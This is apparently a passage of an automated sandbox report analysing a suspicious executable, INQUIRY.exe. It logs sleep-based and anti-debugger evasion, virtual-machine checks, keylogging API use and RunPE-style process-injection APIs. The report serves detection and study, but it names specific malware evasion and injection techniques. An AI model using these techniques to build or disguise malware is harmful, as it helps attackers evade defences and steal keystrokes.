                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99562s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99453s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99109s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98562s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98453s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98062s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97609s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6600Thread sleep count: 150 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 612Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 7136Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6320Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6328Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 1548Thread sleep count: 51 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5260Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5492Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5560Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5508Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5956Thread sleep count: 99 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6680Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6756Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4780Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6820Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6780Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99860s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99750s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98797s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98610s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98360s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98047s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97953s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97860s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97610s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97406s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97297s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97047s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -96953s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -96860s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4476Thread sleep count: 213 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6152Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6432Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6444Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6292Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5900Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99562s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99453s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99109s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98562s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98453s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98062s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97609s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6600Thread sleep count: 150 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 612Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 7136Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6320Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6328Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 1548Thread sleep count: 51 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5260Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5492Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5560Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5508Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5956Thread sleep count: 99 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile opened: PhysicalDrive0
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile opened: PhysicalDrive0
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\INQUIRY.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\INQUIRY.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\INQUIRY.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004089B8 FindFirstFileA,GetLastError,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004089B8 FindFirstFileA,GetLastError,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_004089B8 FindFirstFileA,GetLastError,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00421010 GetSystemInfo,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00421010 GetSystemInfo,
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: WerFault.exe, 00000016.00000002.818731802.0000000004BCC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW|p
                    Source: WerFault.exe, 00000009.00000002.730528117.000000000481B000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.818731802.0000000004BCC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: WerFault.exe, 00000009.00000002.730528117.000000000481B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWonic0Local Area Connection* 7
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: WerFault.exe, 00000016.00000002.818731802.0000000004BCC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW|p
                    Source: WerFault.exe, 00000009.00000002.730528117.000000000481B000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.818731802.0000000004BCC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: WerFault.exe, 00000009.00000002.730528117.000000000481B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWonic0Local Area Connection* 7
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048B6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048B6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048F412 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048F4D0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048F412 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048F4D0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048B6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048A746 SetUnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048BBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048DD7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048B6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048A746 SetUnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048BBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048DD7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory protected: page read and write | page guard
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory protected: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    .NET source code references suspicious native API functionsShow sources
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
